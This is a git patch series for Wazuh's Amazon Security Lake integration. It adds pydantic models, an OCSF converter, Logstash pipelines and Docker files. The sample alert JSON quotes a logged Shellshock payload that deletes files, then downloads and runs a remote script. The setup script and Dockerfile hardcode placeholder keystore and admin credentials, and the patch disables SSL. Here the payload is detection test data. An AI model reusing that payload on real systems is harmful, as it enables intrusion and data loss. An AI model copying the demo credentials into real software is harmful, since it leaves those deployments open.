+    command: tail -f /dev/null
+    # command: logstash -f /usr/share/logstash/pipeline/pipe-output.config
+
+volumes:
+  opensearch-data:
+
+networks:
+  opensearch-net:
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/logstash/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf
similarity index 69%
rename from integrations/amazon-security-lake/logstash/pipe-output.conf
rename to integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf
index 4f64eb5a46a54..0cc7a7d089ec3 100644
--- a/integrations/amazon-security-lake/logstash/pipe-output.conf
+++ b/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf
@@ -1,11 +1,10 @@
 input {
    opensearch {
-      hosts =>  ["127.0.0.1:9200"]
-      user  =>  "${WAZUH_INDEXER_USERNAME}"
-      password  =>  "${WAZUH_INDEXER_PASSWORD}"
+      hosts =>  ["opensearch-node:9200"]
+      user  =>  "${INDEXER_USERNAME}"
+      password  =>  "${INDEXER_PASSWORD}"
+      ssl => false
       index =>  "wazuh-alerts-4.x-*"
-      ssl => true
-      ca_file => "/etc/logstash/wi-certs/root-ca.pem"
       query =>  '{
             "query": {
                "range": {
@@ -15,7 +14,7 @@ input {
                }
             }
       }'
-			target => "_source"
+      target => "_source"
       schedule => "* * * * *"
    }
 }
diff --git a/integrations/amazon-security-lake/logstash/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf
similarity index 100%
rename from integrations/amazon-security-lake/logstash/wazuh-s3.conf
rename to integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf
diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh
new file mode 100644
index 0000000000000..2b1fc109f401a
--- /dev/null
+++ b/integrations/amazon-security-lake/logstash/setup.sh
@@ -0,0 +1,15 @@
+#!/usr/bin/bash
+
+# This script creates and configures a keystore for Logstash to store
+# indexer's credentials. NOTE: works only for dockerized logstash.
+#   Source: https://www.elastic.co/guide/en/logstash/current/keystore.html
+
+# Prepare keystore
+set +o history
+export LOGSTASH_KEYSTORE_PASS="SecretPassword"
+set -o history
+
+# Create keystore
+/usr/share/logstash/bin/logstash-keystore create
+echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME
+echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD
diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py
deleted file mode 100644
index 777a7d20549b5..0000000000000
--- a/integrations/amazon-security-lake/ocsf/__init__.py
+++ /dev/null
@@ -1,2 +0,0 @@
-# Python module placeholder
-# TODO export submodules
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py
deleted file mode 100644
index c927afa8fe87f..0000000000000
--- a/integrations/amazon-security-lake/ocsf/converter.py
+++ /dev/null
@@ -1,89 +0,0 @@
-#!/usr/bin/python3
-
-# event comes from Filebeat
-#event = {}
-#print(event)
-
-def normalize(level: int) -> int:
-  """
-  Normalizes rule level into the 0-6 range, required by OCSF.
-  """
-  # TODO normalization
-  return level
-
-
-def join(iterable, separator=","):
-  return (separator.join(iterable))
-
-
-def convert(event: dict) -> dict:
-  """
-  Converts Wazuh events to OCSF's Detecting Finding (2004) class.
-  """
-  ocsf_class_template = \
-    {
-      "activity_id": 1,
-      "category_name": "Findings",
-      "category_uid": 2,
-      "class_name": "Detection Finding",
-      "class_uid": 2004,
-      "count": event["_source"]["rule"]["firedtimes"],
-      "message": event["_source"]["rule"]["description"],
-      "finding_info": {
-        "analytic": {
-          "category": join(event["_source"]["rule"]["groups"]),
-          "name": event["_source"]["decoder"]["name"],
-          "type_id": 1,
-          "uid": event["_source"]["rule"]["id"],
-        },
-        "attacks": {
-          "tactic": {
-            #"name": join(event["_source"]["rule"]["mitre"]["tactic"]),
-            "dummy": True
-          },
-          "technique": {
-            #"name": join(event["_source"]["rule"]["mitre"]["technique"]),
-            #"uid": join(event["_source"]["rule"]["mitre"]["id"]),
-            "dummy": True
-          },
-          "version": "v13.1"
-        },
-        "title": event["_source"]["rule"]["description"],
-        "types": [
-          event["_source"]["input"]["type"]
-        ],
-        "uid": event["_source"]['id']
-      },
-      "metadata": {
-        "log_name": "Security events",
-        "log_provider": "Wazuh",
-        "product": {
-          "name": "Wazuh",
-          "lang": "en",
-          "vendor_name": "Wazuh, Inc,."
-        },
-        "version": "1.1.0",
-      },
-      #"raw_data": event["_source"]["full_log"],
-      "resources": [
-        {
-          "name": event["_source"]["agent"]["name"],
-          "uid": event["_source"]["agent"]["id"]
-        },
-      ],
-      "risk_score": event["_source"]["rule"]["level"],
-      "severity_id": normalize(event["_source"]["rule"]["level"]),
-      "status_id": 99,
-      "time": event["_source"]["timestamp"],
-      "type_uid": 200401,
-      "unmapped": {
-        "data_sources": [
-          #event["_source"]["_index"],
-          event["_source"]["location"],
-          event["_source"]["manager"]["name"]
-        ],
-        #"nist": event["_source"]["rule"]["nist_800_53"],  # Array
-      }
-    }
-
-  return ocsf_class_template
diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json
deleted file mode 100644
index 3f35697a9fe36..0000000000000
--- a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json
+++ /dev/null
@@ -1,90 +0,0 @@
-{
-  "_index": "wazuh-alerts-4.x-2024.02.08",
-  "_id": "yBMliY0Bt8FzffO0BOIu",
-  "_version": 1,
-  "_score": null,
-  "_source": {
-    "input": {
-      "type": "log"
-    },
-    "agent": {
-      "name": "redacted.com",
-      "id": "000"
-    },
-    "manager": {
-      "name": "redacted.com"
-    },
-    "data": {
-      "protocol": "GET",
-      "srcip": "000.111.222.10",
-      "id": "404",
-      "url": "/cgi-bin/jarrewrite.sh"
-    },
-    "rule": {
-      "firedtimes": 1,
-      "mail": false,
-      "level": 6,
-      "pci_dss": [
-        "11.4"
-      ],
-      "tsc": [
-        "CC6.1",
-        "CC6.8",
-        "CC7.2",
-        "CC7.3"
-      ],
-      "description": "Shellshock attack attempt",
-      "groups": [
-        "web",
-        "accesslog",
-        "attack"
-      ],
-      "mitre": {
-        "technique": [
-          "Exploitation for Privilege Escalation",
-          "Exploit Public-Facing Application"
-        ],
-        "id": [
-          "T1068",
-          "T1190"
-        ],
-        "tactic": [
-          "Privilege Escalation",
-          "Initial Access"
-        ]
-      },
-      "id": "31166",
-      "nist_800_53": [
-        "SI.4"
-      ],
-      "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271",
-      "gdpr": [
-        "IV_35.7.d"
-      ]
-    },
-    "location": "/var/log/nginx/access.log",
-    "decoder": {
-      "name": "web-accesslog"
-    },
-    "id": "1707402914.872885",
-    "GeoLocation": {
-      "city_name": "Amsterdam",
-      "country_name": "Netherlands",
-      "region_name": "North Holland",
-      "location": {
-        "lon": 4.9087,
-        "lat": 52.3534
-      }
-    },
-    "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"",
-    "timestamp": "2024-02-08T11:35:14.334-0300"
-  },
-  "fields": {
-    "timestamp": [
-      "2024-02-08T14:35:14.334Z"
-    ]
-  },
-  "sort": [
-    1707402914334
-  ]
-}
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt
index 8c7a1cbaae79b..8ebe50a4ef264 100644
--- a/integrations/amazon-security-lake/requirements.txt
+++ b/integrations/amazon-security-lake/requirements.txt
@@ -1,2 +1,3 @@
 pyarrow>=10.0.1
-parquet-tools>=0.2.15
\ No newline at end of file
+parquet-tools>=0.2.15
+pydantic==2.6.1
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py
new file mode 100644
index 0000000000000..d8234226bf98e
--- /dev/null
+++ b/integrations/amazon-security-lake/run.py
@@ -0,0 +1,34 @@
+import transform
+import json
+
+
+def _test():
+    ocsf_event = {}
+    with open("./wazuh-event.sample.json", "r") as fd:
+        # Load from file descriptor
+        raw_event = json.load(fd)
+        try:
+            event = transform.converter.from_json(raw_event)
+            print(event)
+            ocsf_event = transform.converter.to_detection_finding(event)
+            print("")
+            print("--")
+            print("")
+            print(ocsf_event)
+        #     event = Event.model_validate_json(json.dumps(event))
+        #     print(event)
+        #     ocsf_event = to_detection_finding(event)
+
+        except KeyError as e:
+            raise (e)
+        # except ValidationError as e:
+        #     print(e)
+
+        # if ocsf_event:
+        #     with open("wazuh-event.ocsf.json", "w") as fd:
+        #         json.dump(ocsf_event.model_dump(), fd)
+        #         print(ocsf_event.model_dump())
+
+
+if __name__ == '__main__':
+    _test()
diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py
index eee82036c3ff5..ab399f58b7b9a 100755
--- a/integrations/amazon-security-lake/stdin_to_securitylake.py
+++ b/integrations/amazon-security-lake/stdin_to_securitylake.py
@@ -7,8 +7,9 @@
 import time
 import json
 import datetime
-from pyarrow import parquet, Table
-from ocsf import converter
+from pyarrow import parquet, Table, fs
+
+from transform import converter
 
 block_ending = { "block_ending": True }
 
diff --git a/integrations/amazon-security-lake/transform/__init__.py b/integrations/amazon-security-lake/transform/__init__.py
new file mode 100644
index 0000000000000..6e8733a32b85d
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/__init__.py
@@ -0,0 +1 @@
+import transform.converter
diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py
new file mode 100644
index 0000000000000..983ba9572841f
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/converter.py
@@ -0,0 +1,112 @@
+import json
+
+import pydantic
+import transform.models as models
+
+
+def normalize(level: int) -> int:
+    """
+    Normalizes rule level into the 0-6 range, required by OCSF.
+    """
+    # TODO normalization
+    return level
+
+
+def join(iterable, separator=","):
+    return (separator.join(iterable))
+
+
+def to_detection_finding(event: models.wazuh.Event) -> models.ocsf.DetectionFinding:
+    finding_info = models.ocsf.FindingInfo(
+        analytic=models.ocsf.AnalyticInfo(
+            category=", ".join(event.rule.groups),
+            name=event.decoder.name,
+            type_id=1,
+            uid=event.rule.id
+        ),
+        attacks=models.ocsf.AttackInfo(
+            tactic=models.ocsf.TechniqueInfo(
+                name=", ".join(event.rule.mitre.tactic),
+                uid=", ".join(event.rule.mitre.id)
+            ),
+            technique=models.ocsf.TechniqueInfo(
+                name=", ".join(event.rule.mitre.technique),
+                uid=", ".join(event.rule.mitre.id)
+            ),
+            version="v13.1"
+        ),
+        title=event.rule.description,
+        types=[event.input.type],
+        uid=event.id
+    )
+
+    metadata = models.ocsf.Metadata(
+        log_name="Security events",
+        log_provider="Wazuh",
+        product=models.ocsf.ProductInfo(
+            name="Wazuh",
+            lang="en",
+            vendor_name="Wazuh, Inc,."
+        ),
+        version="1.1.0"
+    )
+
+    resources = [models.ocsf.Resource(
+        name=event.agent.name, uid=event.agent.id)]
+
+    severity_id = normalize(event.rule.level)
+
+    unmapped = {
+        "data_sources": [
+            event.location,
+            event.manager.name
+        ],
+        "nist": event.rule.nist_800_53  # Array
+    }
+
+    return models.ocsf.DetectionFinding(
+        count=event.rule.firedtimes,
+        message=event.rule.description,
+        finding_info=finding_info,
+        metadata=metadata,
+        raw_data=event.full_log,
+        resources=resources,
+        risk_score=event.rule.level,
+        severity_id=severity_id,
+        time=event.timestamp,
+        unmapped=unmapped
+    )
+
+
+def from_json(event: dict) -> models.wazuh.Event:
+    # Needs to a string, bytes or bytearray
+    try:
+        return models.wazuh.Event.model_validate_json(json.dumps(event))
+    except pydantic.ValidationError as e:
+        print(e)
+
+
+def _test():
+    ocsf_event = {}
+    with open("wazuh-event.sample.json", "r") as fd:
+        # Load from file descriptor
+        event = json.load(fd)
+        try:
+            # Create instance of Event from JSON input (must be string, bytes or bytearray)
+            event = models.wazuh.Event.model_validate_json(json.dumps(event))
+            print(event)
+            ocsf_event = to_detection_finding(event)
+
+        except KeyError as e:
+            raise (e)
+        except pydantic.ValidationError as e:
+            print(e)
+
+        if ocsf_event:
+            with open("wazuh-event.ocsf.json", "w") as fd:
+                json.dump(ocsf_event.model_dump(), fd)
+                print(ocsf_event.model_dump())
+
+
+if __name__ == '__main__':
+    _test()
diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py
new file mode 100644
index 0000000000000..2a14b75957c97
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py
@@ -0,0 +1,87 @@
+#!/usr/bin/python
+
+# event comes from Filebeat
+event = {}
+
+
+def normalize(level: int) -> int:
+    """
+    Normalizes rule level into the 0-6 range, required by OCSF.
+    """
+    # TODO normalization
+    return level
+
+
+def join(iterable, separator=","):
+    return (separator.join(iterable))
+
+
+def convert(event: dict) -> dict:
+    """
+    Converts Wazuh events to OCSF's Detecting Finding (2004) class.
+    """
+    ocsf_class_template = \
+        {
+            "activity_id": 1,
+            "category_name": "Findings",
+            "category_uid": 2,
+            "class_name": "Detection Finding",
+            "class_uid": 2004,
+            "count": event["rule"]["firedtimes"],
+            "message": event["rule"]["description"],
+            "finding_info": {
+                "analytic": {
+                    "category": join(event["rule"]["groups"]),
+                    "name": event["decoder"]["name"],
+                    "type_id": 1,
+                    "uid": event["rule"]["id"],
+                },
+                "attacks": {
+                    "tactic": {
+                        "name": join(event["rule"]["mitre"]["tactic"]),
+                    },
+                    "technique": {
+                        "name": join(event["rule"]["mitre"]["technique"]),
+                        "uid": join(event["rule"]["mitre"]["id"]),
+                    },
+                    "version": "v13.1"
+                },
+                "title": event["rule"]["description"],
+                "types": [
+                    event["input"]["type"]
+                ],
+                "uid": event['id']
+            },
+            "metadata": {
+                "log_name": "Security events",
+                "log_provider": "Wazuh",
+                "product": {
+                    "name": "Wazuh",
+                    "lang": "en",
+                    "vendor_name": "Wazuh, Inc,."
+                },
+                "version": "1.1.0",
+            },
+            "raw_data": event["full_log"],
+            "resources": [
+                {
+                    "name": event["agent"]["name"],
+                    "uid": event["agent"]["id"]
+                },
+            ],
+            "risk_score": event["rule"]["level"],
+            "severity_id": normalize(event["rule"]["level"]),
+            "status_id": 99,
+            "time": event["timestamp"],
+            "type_uid": 200401,
+            "unmapped": {
+                "data_sources": [
+                    event["_index"],
+                    event["location"],
+                    event["manager"]["name"]
+                ],
+                "nist": event["rule"]["nist_800_53"],  # Array
+            }
+        }
+
+    return ocsf_class_template
diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/transform/legacy/legacy_test.py
similarity index 57%
rename from integrations/amazon-security-lake/ocsf/test.py
rename to integrations/amazon-security-lake/transform/legacy/legacy_test.py
index e7d947848b067..ebcb8fa4b2e90 100644
--- a/integrations/amazon-security-lake/ocsf/test.py
+++ b/integrations/amazon-security-lake/transform/legacy/legacy_test.py
@@ -1,15 +1,15 @@
 #!/usr/bin/python
 
-from converter import convert
+from transform.legacy.converter import convert
 import json
 
 converted_event = {}
-with open("wazuh-event.sample.json", "r") as fd:
+with open("../wazuh-event.sample.json", "r") as fd:
     sample_event = json.load(fd)
     # print(json.dumps(sample_event, indent=4))
     converted_event = convert(sample_event)
-    
+
 if converted_event:
-    with open("wazuh-event.ocsf.json", "w") as fd:
+    with open("../wazuh-event.ocsf.json", "w") as fd:
         json.dump(converted_event, fd)
-        print("Done")
\ No newline at end of file
+        print("Done")
diff --git a/integrations/amazon-security-lake/transform/models/__init__.py b/integrations/amazon-security-lake/transform/models/__init__.py
new file mode 100644
index 0000000000000..2fdec7bc648af
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/models/__init__.py
@@ -0,0 +1,2 @@
+import transform.models.wazuh
+import transform.models.ocsf
diff --git a/integrations/amazon-security-lake/transform/models/ocsf.py b/integrations/amazon-security-lake/transform/models/ocsf.py
new file mode 100644
index 0000000000000..4918b6e29081c
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/models/ocsf.py
@@ -0,0 +1,66 @@
+import pydantic
+import typing
+
+
+class AnalyticInfo(pydantic.BaseModel):
+    category: str
+    name: str
+    type_id: int
+    uid: str
+
+
+class TechniqueInfo(pydantic.BaseModel):
+    name: str
+    uid: str
+
+
+class AttackInfo(pydantic.BaseModel):
+    tactic: TechniqueInfo
+    technique: TechniqueInfo
+    version: str
+
+
+class FindingInfo(pydantic.BaseModel):
+    analytic: AnalyticInfo
+    attacks: AttackInfo
+    title: str
+    types: typing.List[str]
+    uid: str
+
+
+class ProductInfo(pydantic.BaseModel):
+    name: str
+    lang: str
+    vendor_name: str
+
+
+class Metadata(pydantic.BaseModel):
+    log_name: str
+    log_provider: str
+    product: ProductInfo
+    version: str
+
+
+class Resource(pydantic.BaseModel):
+    name: str
+    uid: str
+
+
+class DetectionFinding(pydantic.BaseModel):
+    activity_id: int = 1
+    category_name: str = "Findings"
+    category_uid: int = 2
+    class_name: str = "Detection Finding"
+    class_uid: int = 2004
+    count: int
+    message: str
+    finding_info: FindingInfo
+    metadata: Metadata
+    raw_data: str
+    resources: typing.List[Resource]
+    risk_score: int
+    severity_id: int
+    status_id: int = 99
+    time: str
+    type_uid: int = 200401
+    unmapped: typing.Dict[str, typing.List[str]] = pydantic.Field()
diff --git a/integrations/amazon-security-lake/transform/models/wazuh.py b/integrations/amazon-security-lake/transform/models/wazuh.py
new file mode 100644
index 0000000000000..34aa3c91e96e1
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/models/wazuh.py
@@ -0,0 +1,50 @@
+import pydantic
+import typing
+
+# =========== Wazuh event models =========== #
+# These are only the fields required for the integration.
+
+
+class Mitre(pydantic.BaseModel):
+    technique: typing.List[str] = []
+    id: typing.List[str] = ""
+    tactic: typing.List[str] = []
+
+
+class Rule(pydantic.BaseModel):
+    firedtimes: int = 0
+    description: str = ""
+    groups: typing.List[str] = []
+    id: str = ""
+    mitre: Mitre = Mitre()
+    level: int = 0
+    nist_800_53: typing.List[str] = []
+
+
+class Decoder(pydantic.BaseModel):
+    name: str
+
+
+class Input(pydantic.BaseModel):
+    type: str
+
+
+class Agent(pydantic.BaseModel):
+    name: str
+    id: str
+
+
+class Manager(pydantic.BaseModel):
+    name: str
+
+
+class Event(pydantic.BaseModel):
+    rule: Rule = {}
+    decoder: Decoder = {}
+    input: Input = {}
+    id: str = ""
+    full_log: str = ""
+    agent: Agent = {}
+    timestamp: str = ""
+    location: str = ""
+    manager: Manager = {}
diff --git a/integrations/amazon-security-lake/wazuh-event.sample.json b/integrations/amazon-security-lake/wazuh-event.sample.json
new file mode 100644
index 0000000000000..d7e0558b62c62
--- /dev/null
+++ b/integrations/amazon-security-lake/wazuh-event.sample.json
@@ -0,0 +1,76 @@
+{
+  "input": {
+    "type": "log"
+  },
+  "agent": {
+    "name": "redacted.com",
+    "id": "000"
+  },
+  "manager": {
+    "name": "redacted.com"
+  },
+  "data": {
+    "protocol": "GET",
+    "srcip": "000.111.222.10",
+    "id": "404",
+    "url": "/cgi-bin/jarrewrite.sh"
+  },
+  "rule": {
+    "firedtimes": 1,
+    "mail": false,
+    "level": 6,
+    "pci_dss": [
+      "11.4"
+    ],
+    "tsc": [
+      "CC6.1",
+      "CC6.8",
+      "CC7.2",
+      "CC7.3"
+    ],
+    "description": "Shellshock attack attempt",
+    "groups": [
+      "web",
+      "accesslog",
+      "attack"
+    ],
+    "mitre": {
+      "technique": [
+        "Exploitation for Privilege Escalation",
+        "Exploit Public-Facing Application"
+      ],
+      "id": [
+        "T1068",
+        "T1190"
+      ],
+      "tactic": [
+        "Privilege Escalation",
+        "Initial Access"
+      ]
+    },
+    "id": "31166",
+    "nist_800_53": [
+      "SI.4"
+    ],
+    "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271",
+    "gdpr": [
+      "IV_35.7.d"
+    ]
+  },
+  "location": "/var/log/nginx/access.log",
+  "decoder": {
+    "name": "web-accesslog"
+  },
+  "id": "1707402914.872885",
+  "GeoLocation": {
+    "city_name": "Amsterdam",
+    "country_name": "Netherlands",
+    "region_name": "North Holland",
+    "location": {
+      "lon": 4.9087,
+      "lat": 52.3534
+    }
+  },
+  "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"",
+  "timestamp": "2024-02-08T11:35:14.334-0300"
+}
\ No newline at end of file

From 05ae2d15a92777e885cc3890ebf94ac2bab65b1f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Thu, 22 Feb 2024 15:49:49 +0100
Subject: [PATCH 25/34] Create minimal Docker environment to test and develop
 the integration.

---
 integrations/.gitignore                       |   5 +
 integrations/README.md                        |  32 ++++
 .../amazon-security-lake/.dockerignore        | 180 ++++++++++++++++++
 integrations/amazon-security-lake/Dockerfile  |  41 ++++
 integrations/amazon-security-lake/README.md   |  15 +-
 .../logstash/pipeline/indexer-to-file.conf    |  26 +++
 ...output.conf => indexer-to-integrator.conf} |   0
 .../{wazuh-s3.conf => indexer-to-s3.conf}     |   0
 .../amazon-security-lake/logstash/setup.sh    |  11 +-
 integrations/amazon-security-lake/run.py      |   2 +
 .../stdin_to_securitylake.py                  |   2 +-
 .../amazon-security-lake.yml}                 |  29 ++-
 .../tools/events-generator/.dockerignore      |   2 +
 .../tools/events-generator/Dockerfile         |   4 +
 integrations/tools/events-generator/README.md |  11 ++
 integrations/tools/events-generator/run.py    |  13 +-
 16 files changed, 349 insertions(+), 24 deletions(-)
 create mode 100644 integrations/.gitignore
 create mode 100644 integrations/README.md
 create mode 100644 integrations/amazon-security-lake/.dockerignore
 create mode 100644 integrations/amazon-security-lake/Dockerfile
 create mode 100644 integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
 rename integrations/amazon-security-lake/logstash/pipeline/{pipe-output.conf => indexer-to-integrator.conf} (100%)
 rename integrations/amazon-security-lake/logstash/pipeline/{wazuh-s3.conf => indexer-to-s3.conf} (100%)
 rename integrations/{amazon-security-lake/docker-compose.yml => docker/amazon-security-lake.yml} (69%)
 create mode 100644 integrations/tools/events-generator/.dockerignore
 create mode 100644 integrations/tools/events-generator/Dockerfile

diff --git a/integrations/.gitignore b/integrations/.gitignore
new file mode 100644
index 0000000000000..8f10b6459740c
--- /dev/null
+++ b/integrations/.gitignore
@@ -0,0 +1,5 @@
+elastic
+opensearch
+splunk
+common
+config
\ No newline at end of file
diff --git a/integrations/README.md b/integrations/README.md
new file mode 100644
index 0000000000000..5e69b4f673d6c
--- /dev/null
+++ b/integrations/README.md
@@ -0,0 +1,32 @@
+## Wazuh indexer integrations
+
+This folder contains integrations with third-party XDR, SIEM and cybersecurity software. 
+The goal is to transport Wazuh's analysis to the platform that suits your needs.
+
+### Amazon Security Lake
+
+TBD
+
+##### Usage
+
+A demo of the integration can be started using the content of this folder and Docker.
+
+```console
+docker compose -f ./docker/amazon-security-lake.yml up -d
+```
+
+This docker compose project will bring a *wazuh-indexer* node, a *wazuh-dashboard* node, 
+a *logstash* node and our event generator. On the one hand, the event generator will push events 
+constantly to the indexer. On the other hand, logstash will constantly query for new data and
+deliver it to the integration Python program, also present in that node. Finally, the integration 
+module will prepare and send the data to the Amazon Security Lake's S3 bucket. 
+<!-- TODO continue with S3 credentials setup -->
+
+For production usage, follow the instructions in our documentation page about this matter.
+(_when-its-done_)
+
+As a last note, we would like to point out that we also use this Docker environment for development.
+
+### Other integrations
+
+TBD
diff --git a/integrations/amazon-security-lake/.dockerignore b/integrations/amazon-security-lake/.dockerignore
new file mode 100644
index 0000000000000..891ff7a135014
--- /dev/null
+++ b/integrations/amazon-security-lake/.dockerignore
@@ -0,0 +1,180 @@
+wazuh-event.ocsf.json
+*.parquet
+Dockerfile
+
+# Created by https://www.toptal.com/developers/gitignore/api/python
+# Edit at https://www.toptal.com/developers/gitignore?templates=python
+
+### Python ###
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+wheels/
+share/python-wheels/
+*.egg-info/
+.installed.cfg
+*.egg
+MANIFEST
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.nox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*.cover
+*.py,cover
+.hypothesis/
+.pytest_cache/
+cover/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+db.sqlite3
+db.sqlite3-journal
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+.pybuilder/
+target/
+
+# Jupyter Notebook
+.ipynb_checkpoints
+
+# IPython
+profile_default/
+ipython_config.py
+
+# pyenv
+#   For a library or package, you might want to ignore these files since the code is
+#   intended to run in multiple environments; otherwise, check them in:
+# .python-version
+
+# pipenv
+#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
+#   However, in case of collaboration, if having platform-specific dependencies or dependencies
+#   having no cross-platform support, pipenv may install dependencies that don't work, or not
+#   install all needed dependencies.
+#Pipfile.lock
+
+# poetry
+#   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
+#   This is especially recommended for binary packages to ensure reproducibility, and is more
+#   commonly ignored for libraries.
+#   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
+#poetry.lock
+
+# pdm
+#   Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
+#pdm.lock
+#   pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
+#   in version control.
+#   https://pdm.fming.dev/#use-with-ide
+.pdm.toml
+
+# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
+__pypackages__/
+
+# Celery stuff
+celerybeat-schedule
+celerybeat.pid
+
+# SageMath parsed files
+*.sage.py
+
+# Environments
+.env
+.venv
+env/
+venv/
+ENV/
+env.bak/
+venv.bak/
+
+# Spyder project settings
+.spyderproject
+.spyproject
+
+# Rope project settings
+.ropeproject
+
+# mkdocs documentation
+/site
+
+# mypy
+.mypy_cache/
+.dmypy.json
+dmypy.json
+
+# Pyre type checker
+.pyre/
+
+# pytype static type analyzer
+.pytype/
+
+# Cython debug symbols
+cython_debug/
+
+# PyCharm
+#  JetBrains specific template is maintained in a separate JetBrains.gitignore that can
+#  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
+#  and can be added to the global gitignore or merged into this file.  For a more nuclear
+#  option (not recommended) you can uncomment the following to ignore the entire idea folder.
+#.idea/
+
+### Python Patch ###
+# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration
+poetry.toml
+
+# ruff
+.ruff_cache/
+
+# LSP config files
+pyrightconfig.json
+
+# End of https://www.toptal.com/developers/gitignore/api/python
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/Dockerfile b/integrations/amazon-security-lake/Dockerfile
new file mode 100644
index 0000000000000..a2eec0f8d6075
--- /dev/null
+++ b/integrations/amazon-security-lake/Dockerfile
@@ -0,0 +1,41 @@
+# MULTI-STAGE build
+
+FROM python:3.9 as builder
+# Create a virtualenv for dependencies. This isolates these packages from
+# system-level packages.
+RUN python3 -m venv /env
+# Setting these environment variables are the same as running
+# source /env/bin/activate.
+ENV VIRTUAL_ENV /env
+ENV PATH /env/bin:$PATH
+# Copy the application's requirements.txt and run pip to install all
+# dependencies into the virtualenv.
+COPY requirements.txt /app/requirements.txt
+RUN pip install -r /app/requirements.txt
+
+
+FROM python:3.9
+ENV LOGSTASH_KEYSTORE_PASS="SecretPassword"
+# Add the application source code.
+COPY --chown=logstash:logstash . /home/app
+# Add execution persmissions.
+RUN chmod a+x /home/app/run.py
+# Copy the application's dependencies.
+COPY --from=builder /env /env
+
+# Install Logstash
+RUN apt-get update && apt-get install -y iputils-ping wget gpg apt-transport-https
+RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \
+    echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \
+    apt-get update && apt install -y logstash
+# Install logstash-input-opensearch plugin.
+RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
+# Copy the Logstash's ingestion pipelines.
+COPY --chown=logstash:logstash logstash/pipeline /usr/share/logstash/pipeline
+# Grant logstash ownership over its files
+RUN chown --recursive logstash:logstash /usr/share/logstash /etc/logstash /var/log/logstash /var/lib/logstash
+
+USER logstash
+# Copy and run the setup.sh script to create and configure a keystore for Logstash.
+COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh
+RUN bash /usr/share/logstash/bin/setup.sh
\ No newline at end of file
